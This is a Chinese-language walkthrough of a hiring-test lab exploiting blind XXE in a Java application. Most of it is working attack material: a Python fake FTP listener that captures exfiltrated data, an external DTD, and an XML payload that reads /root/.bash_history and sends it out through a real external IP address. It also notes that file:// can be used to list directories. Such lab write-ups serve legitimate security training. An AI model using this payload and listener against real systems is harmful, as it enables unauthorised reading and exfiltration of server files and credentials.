投简历后,公司下发的靶场 要求60小时内做完(不是我投的简历),简单记录一下过程

扫一遍端口和目录,目录发现admin目录,抓包会看到xml形式传递数据,看看能不能xxe.

经过简单的测试发现可以盲打 XXE(blind XXE,响应里看不到文件内容,需要外带);从服务器返回的报错信息来看,靶场是 Java 的。php://filter 这类能把文件内容先 base64 编码的协议只有 PHP 才有,Java 下无法先编码再外带,多行或含特殊字符的文件内容直接拼进 HTTP URL 会出错,所以 HTTP 外带不可用,改用 FTP 外带即可。

这里 Java 通过 ftp://ip/data 去访问时并不会真正完成文件传输,数据其实是作为 FTP 控制通道里命令(如 RETR/CWD)的参数发过来的,所以正常的 FTP 服务器收不到内容。需要自己搭一个只负责应答并把收到的命令原样记录下来的假 FTP 服务来接收数据。

先搭建一个ftp服务器


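class FTPServer(SocketServer.BaseRequestHandler):
    """Fake FTP control-channel handler used as the out-of-band sink for blind XXE.

    The target's XML parser is steered to ``ftp://<this host>:<port>/<contents of
    the file>`` (see the external DTD), so the exfiltrated data arrives as the
    *argument* of the FTP commands the client sends on the control channel
    (``RETR ...``; presumably also ``CWD ...`` for path segments -- TODO confirm).
    No data connection is ever opened; the handler only answers enough of the
    protocol to keep the client talking and logs every command verbatim via
    ``logger`` (defined elsewhere in this file).

    Written for Python 2 (``SocketServer`` module, ``str`` on sockets).

    NOTE(review): the listener accepts connections from anyone who can reach the
    port, and everything it logs is untrusted bytes from the network (it may
    contain terminal escape sequences); do not leave it exposed longer than needed.
    """

    # Commands that are logged as plain protocol chatter rather than as data.
    _PLAIN_COMMANDS = ("USER", "PASS", "TYPE", "EPRT", "EPSV", "QUIT")
    # Hint for the "file exists but the client gave up" heuristic; the JDK
    # version note in it is the original author's claim, not verified here.
    _MULTILINE_HINT = "[*] file exists! maybe target cannot send multi-lines file!(jdk<7u141/jdk<8u162 supported)"

    def handle(self):
        """Serve one client connection until it disconnects, times out or errors."""
        self.request.settimeout(10)
        logger("[+] victim [{}] has connected FTP !".format(self.client_address[0]), is_print=True)
        self.request.sendall("220 ftp-server\n")
        try:
            while True:
                raw = self.request.recv(4096)
                if not raw:
                    # An empty recv() is EOF: the peer closed the control
                    # connection.  The original kept looping and answering into
                    # a closed socket; log the heuristic hint and stop instead.
                    logger(self._MULTILINE_HINT, is_print=True)
                    break
                self.data = raw.strip()
                self._log_command()
                self._reply()
        except Exception as e:
            # The original tested ``"timed out" in e`` (iterating the exception
            # object); match on the message instead, like start_server() does.
            if "timed out" in str(e):
                logger("[*] FTP Client timed out")
            else:
                logger("[-] FTP Client error: {}".format(e), is_print=True)
        logger("[*] FTP Connection closed with {}".format(self.client_address[0]))

    def _log_command(self):
        """Log the command held in ``self.data``, extracting exfiltrated content."""
        if self.data.startswith("RETR "):
            # The URL path -- i.e. the file contents -- is the RETR argument.
            # Slice the prefix off: the original lstrip("RETR ") strips
            # *characters*, eating any leading R/E/T/space of the payload itself.
            payload = self.data[len("RETR "):]
            logger("[+] FTP Received File:\n{separator}\n{}\n{separator}".format(payload, separator="=" * 50), is_print=True)
        elif self.data.startswith(self._PLAIN_COMMANDS):
            logger("[+] FTP: {}".format(self.data), is_print=True)
        elif self.data == '':
            # Whitespace-only command line; behaviour kept from the original.
            logger(self._MULTILINE_HINT, is_print=True)
        else:
            # Any other command: log only its argument (after the first space).
            logger("{}".format(self.data[self.data.find(" ") + 1:]), is_print=True)

    def _reply(self):
        """Send the canned response for the command held in ``self.data``.

        Dispatch is on the command word; the original used substring tests,
        which a payload containing e.g. "LIST" or "USER" could trip.
        """
        if self.data.startswith("LIST"):
            self.request.sendall("drwxrwxrwx 1 owner group 1 Feb 21 01:11 rsl\n")
            self.request.sendall("150 Opening BINARY mode data connection for /bin/ls\n")
            self.request.sendall("226 Transfer complete.\n")
        elif self.data.startswith("USER"):
            self.request.sendall("331 password please - version check\n")
        elif self.data.startswith("PORT"):
            logger("[+] FTP PORT received")
            logger("[+] FTP > 200 PORT command ok")
            self.request.sendall("200 PORT command ok\n")
        elif self.data.startswith("SYST"):
            self.request.sendall("215 RSL\n")
        else:
            # Everything else (PASS, TYPE, EPSV, RETR, ...) gets a generic
            # "keep going" reply; the client presumably tolerates it -- TODO confirm.
            logger("[+] FTP > 230 more data please!")
            self.request.sendall("230 more data please!\n")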


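def start_server(conn, serv_class):
    """Start a ``SocketServer.TCPServer`` serving ``serv_class`` in a background thread.

    Args:
        conn: ``(host, port)`` tuple passed to ``TCPServer``; the host must be
            reachable by the XXE target (e.g. ``"0.0.0.0"``).
        serv_class: request-handler class, e.g. ``FTPServer``.

    Returns:
        The running server instance so the caller can ``shutdown()`` /
        ``server_close()`` it.  (The original discarded it; returning it is
        backward-compatible.)

    Raises:
        SystemExit: via ``exit()`` when the bind fails; an address already in
        use gets a dedicated message, any other socket error its own text.

    The serving thread is a daemon, so the process exits as soon as the main
    thread returns -- the caller has to keep the main thread alive.
    """
    import errno  # function-scope: the file's import header is not visible here

    try:
        server = SocketServer.TCPServer(conn, serv_class)
    except socket.error as e:
        # The original matched the Windows-only text "[Errno 10048]"; compare
        # the errno instead so the message is also right on Linux/macOS.
        if e.errno == errno.EADDRINUSE or "[Errno 10048]" in str(e):
            exit("[-] Port [{}] is already in use".format(conn[1]))
        exit(str(e))
    t = Thread(target=server.serve_forever)
    t.daemon = True
    t.start()
    return server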

用 `python ./xxeftp 2121` 启动,在 2121 端口监听(代码用的是 Python 2 的 SocketServer 模块,需用 python2 运行;确保该端口对靶机可达)

服务器上的secret.dtd

<!-- External DTD fetched by the payload's %dtd; reference.  The nested declaration
     has to live here rather than in the payload's internal subset, because a
     parameter-entity reference inside an entity value is not allowed in the
     internal subset (XML well-formedness constraint "PEs in Internal Subset"). -->
<!-- %file; is the parameter entity declared in the payload (the local file's
     contents); it is spliced into the ftp:// URL path, so the fake FTP listener on
     port 2121 sees the contents as the argument of the client's FTP commands
     (the Python handler logs the RETR argument as the received file). -->
<!ENTITY % hacker "<!ENTITY send SYSTEM 'ftp://服务器ip地址:2121/%file;'>">
%hacker;

发送的payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY[
<!-- %file: the target-side file to exfiltrate (per the author's note below,
     pointing file:// at a directory returns a listing on this Java target). -->
<!ENTITY % file SYSTEM "file:///root/.bash_history">
<!-- %dtd: the attacker-hosted secret.dtd above, which builds the ftp:// entity
     from %file;.  Resolving it is what triggers the out-of-band fetch. -->
<!ENTITY % dtd SYSTEM "http://39.98.35.144:80/secret.dtd">
%dtd;
]>
<!-- &send; is the ftp:// entity declared by secret.dtd; the exfiltration happens
     while the parser resolves it, so whatever value it expands to does not matter. -->
<root><reg><name>admin</name><tel>&send;</tel><email>111111111@qq.com</email></reg></root>

file:// 指向一个目录时,这里的 Java 环境会返回该目录的文件列表,所以可以用它来遍历目录(属于 JDK 的实现行为,不同版本可能有差异)。